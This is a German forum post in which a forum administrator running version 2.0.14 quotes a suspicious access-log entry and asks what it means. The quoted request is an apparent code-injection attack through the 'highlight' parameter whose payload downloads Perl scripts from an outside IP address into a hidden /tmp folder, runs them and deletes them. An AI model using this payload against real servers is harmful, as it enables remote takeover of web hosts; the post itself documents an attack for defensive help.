seit gestern hab ich teilweise kuriose Forenbesucher. Die IP - Nummern sind teilweise aus Deutschland, Belgien - aber auch aus den Staaten oder Taiwan. Ich komme kaum hinterher, die IP - Nummern zu bannen
In meinen Logfiles fand ich derartige Einträge:
[19/Apr/2005:13:35:17 +0200] "GET /viewtopic.php?t=316&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp;cd%20.temp;wget%20http://61.85.234.215/.zk/msn.txt;wget%20http://61.85.234.215/.zk/coll.txt;wget%20http://61.85.234.215/.zk/g.txt;perl%20msn.txt;rm%20msn.txt;perl%20coll.txt;rm%20coll.txt;perl%20g.txt;rm%20g.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 66577 "-" "LWP::Simple/5.63"
Weiss jemand, was das konkret bedeutet ? Diese Einträge sind fast im Stundenrythmus zu finden.
Wenn ich diesen Logeintrag als Adresse eingebe, so wird lediglich der Thread aufgerufen.
Die Forenversion ist 2.0.14.
PS. sorry für den Threadtitel, ich wusste ich, wie ich es beschreiben soll